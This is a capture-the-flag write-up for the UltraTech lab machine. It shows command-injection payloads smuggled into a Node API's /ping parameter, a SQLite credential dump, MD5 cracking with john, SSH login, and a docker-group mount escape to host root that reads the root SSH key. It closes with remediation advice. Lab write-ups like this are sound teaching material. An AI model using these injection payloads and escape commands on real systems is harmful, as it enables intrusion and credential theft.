Case file

Node ping injection, SQLite credential dump, and Docker group escape

Intermediate Linux engagement: UltraTech’s Node /ping API accepted shell metacharacters; SQLite hashes cracked to SSH as r00t; docker group membership mounted the host for root.

Intermediate28 minLinux · Command Injection · Docker · Privilege Escalation
01

Engagement summary

Apache on 31331 and a Node API on 8081. Command injection on /ping dumped utech.db.sqlite; cracked r00t:n100906; docker run -v /:/mnt escaped to host root.

ULTRATECH exposed SSH, a marketing site on 31331 (partners.html → js/api.js), and UltraTech API v0.1.3 on 8081. The /ping?ip= endpoint concatenated operator input into a shell. Quote/backtick injection listed utech.db.sqlite and dumped MD5 hashes for r00t and admin. Offline crack recovered n100906 for r00t. SSH landed inside a container where r00t was in the docker group. docker run -v /:/mnt --rm -it bash chroot /mnt sh mounted the host and exposed /root/.ssh/id_rsa.

Business impact

OS command injection on an internet-facing API is remote code execution. MD5 password storage and docker group membership without rootless constraints are host compromise. Parameterize ping targets, hash with a modern KDF, and treat docker group as equivalent to root.

02

REST /ping command injection

Shell metacharacters on /ping listed and dumped the SQLite credential store.

OPERATOR · API

savvy@lab:~$ nmap -sV -p- 10.10.213.191

22/tcp open ssh

8081/tcp open http Node.js Express

31331/tcp open http Apache

savvy@lab:~$ curl -s "http://10.10.213.191:8081/ping?ip=127.0.0.1'|`ls -la`"

utech.db.sqlite

savvy@lab:~$ curl -s "http://10.10.213.191:8081/ping?ip=127.0.0.1'|`cat utech.db.sqlite`"

r00t f357a0c52799563c7c7b76c1e7543a32

03

Hash crack, SSH, and Docker escape

r00t:n100906 over SSH; docker group mount returned host root and id_rsa.

OPERATOR · ROOT

savvy@lab:~$ echo 'f357a0c52799563c7c7b76c1e7543a32' > hash.txt && john hash.txt --format=Raw-MD5 --wordlist=/usr/share/wordlists/rockyou.txt

n100906 (r00t)

savvy@lab:~$ ssh r00t@10.10.213.191

savvy@lab:~$ id

uid=1001(r00t) groups=1001(r00t),116(docker)

savvy@lab:~$ docker run -v /:/mnt --rm -it bash chroot /mnt /bin/sh

root@lab:~# head -c 9 /root/.ssh/id_rsa

MIIEogIBA

Remediation

Remove shell wrappers from /ping; validate IPs with a library. Upgrade password hashing; drop users from docker unless rootless and audited.